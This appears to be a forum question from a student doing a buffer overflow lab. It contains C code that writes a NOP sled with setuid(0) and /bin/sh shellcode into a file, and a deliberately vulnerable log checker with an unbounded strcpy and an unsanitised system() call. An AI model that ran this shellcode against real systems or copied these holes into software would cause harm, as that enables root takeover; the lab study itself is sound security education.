Buffer overflow exploit, create a bad file and pass it to a program

Question

I am working with buffer overflow exploit to understand it. I have been provided with a program called is_log_file.c to test the buf_exploit.c program I write on it. I am trying to write a program called exploit.c that takes no arguments and writes a malicious log file. This malicious log file will be provided as an argument to is_log_file program and it should exploit a buffer overflow to provide root access. The program should do so without crashing or unclean exist.

is_log_file.c takes a file name and verifies if it conforms to a log file format defined within the file

Code for buf_exploit.c is below:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFFER_SIZE 1024
#define NOP 0x90

char shellcode[]=
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"  // setuid(0);
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80"  // setgid(0);
"\x31\xc0"          /* xorl         %eax,%eax               */
"\x50"              /* pushl        %eax                    */
"\x68""//sh"        /* pushl        $0x68732f2f             */
"\x68""/bin"        /* pushl        $0x6e69622f             */
"\x89\xe3"          /* movl         %esp,%ebx               */
"\x50"              /* pushl        %eax                    */
"\x53"              /* pushl        %ebx                    */
"\x89\xe1"          /* movl         %esp,%ecx               */
"\x99"              /* cdq                                  */
"\xb0\x0b"          /* movb         $0x0b,%al               */
"\xcd\x80"          /* int          $0x80                   */
;

int main() {
   char buffer[BUFFER_SIZE];
   char *log_file = "malicious_log_file";
   FILE *fp;

   // Fill the buffer with NOP instructions
   memset(buffer, NOP, BUFFER_SIZE);

   // Copy the shellcode into the buffer
   memcpy(buffer + (BUFFER_SIZE - sizeof(shellcode)), shellcode, sizeof(shellcode));

   // Write the buffer to the log file
   fp = fopen(log_file, "w");
   fwrite(buffer,BUFFER_SIZE, 1, fp);
   fclose(fp);

   // Execute the is_log_file program with the malicious log file as an argument
  //system("./is_log_file malicious_log_file");

   return 0;
}

code for is_log_file:

/* 
 Buffer Overflow Lab

 Program that verifies that the argument is a valid log file

*/ 
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int verify(char *buffer) {
 char local_buf[32];
 //printf("%p\n", local_buf);
 char VALID_SIGNATURE[23] = "LOG_FILE VERSION_CODE=";
 int rv = 0;

 //valid log file should contain VALID_SIGNATURE
 strcpy(local_buf, buffer);
 rv = strncmp(VALID_SIGNATURE, local_buf, strlen(VALID_SIGNATURE));
 if ( rv == 0)
   return 1;
 return 0;
}

int main(int argc, char ** argv) {

 char command[256] = "./file_exists ";
 char buffer[1024];
 FILE *file = NULL;
 int rv = 0;

 //Verify the number of arguments
 if (argc != 2) {
   printf("Usage: %s <file-to-test>\n", argv[0]);
   return 0;
 }

 //Verify the supplied file exists
 strncat(command, argv[1], 244);
 rv = system(command);
 if (rv <= 0) {
   printf("%s does not exist\n", argv[1]);
   return 0;
 }
 
 //read file
 if ((file = fopen(argv[1], "r")) == NULL) {
   printf("File read error\n");
   return 0;
 }
 fscanf(file,"%[^\n]", buffer);
 fclose(file);

 if (verify(buffer) == 1)
   printf("Valid!!!\n");
 else
   printf("Invalid!!!\n");
 
}   

buf_exploit.c runs without errors, but when I run ./is_log_file malicious _log_file it seg faults, I would appreciate some help getting the code to work. The code is in C